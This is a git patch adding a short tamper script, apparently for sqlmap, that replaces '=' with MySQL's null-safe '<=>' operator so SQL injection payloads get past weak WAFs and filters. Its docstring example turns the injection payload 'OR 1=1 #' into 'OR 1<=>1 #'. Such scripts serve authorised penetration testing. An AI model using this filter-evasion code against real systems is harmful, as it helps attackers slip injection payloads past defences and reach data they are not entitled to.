From d5a95c5a506fbaa3b67cd0cb5764ef0b986fa6fb Mon Sep 17 00:00:00 2001
From: Anonymous ethc4 <cs7778503@gmail.com>
Date: Sat, 12 Jul 2025 08:12:45 -0400
Subject: [PATCH] Create equal2nullsafequals.py

---
 tamper/equal2nullsafequals.py | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 tamper/equal2nullsafequals.py

diff --git a/tamper/equal2nullsafequals.py b/tamper/equal2nullsafequals.py
new file mode 100644
index 000000000..422f378be
--- /dev/null
+++ b/tamper/equal2nullsafequals.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python3
+"""
+Tamper script to replace '=' with '<=>'
+MySQL-only NULL-safe equality operator.
+Useful for bypassing filters that block '='.
+
+Author: relunsec
+"""
+
+from lib.core.enums import PRIORITY
+import re
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload, **kwargs):
+    """
+    Replaces equal signs (=) with MySQL null-safe equal operator (<=>) Sometime bypass Weak WAF/Filters filter (=) sign
+
+    Requirement:
+        * MySQL
+
+    >>> tamper("OR 1=1 #")
+    'OR 1<=>1 #'
+    """
+    if not payload:
+        return payload
+    # Replace '=' with '<=>'
+    payload = re.sub(r'(?<![><!])=(?!=)', '<=>', payload)
+    return payload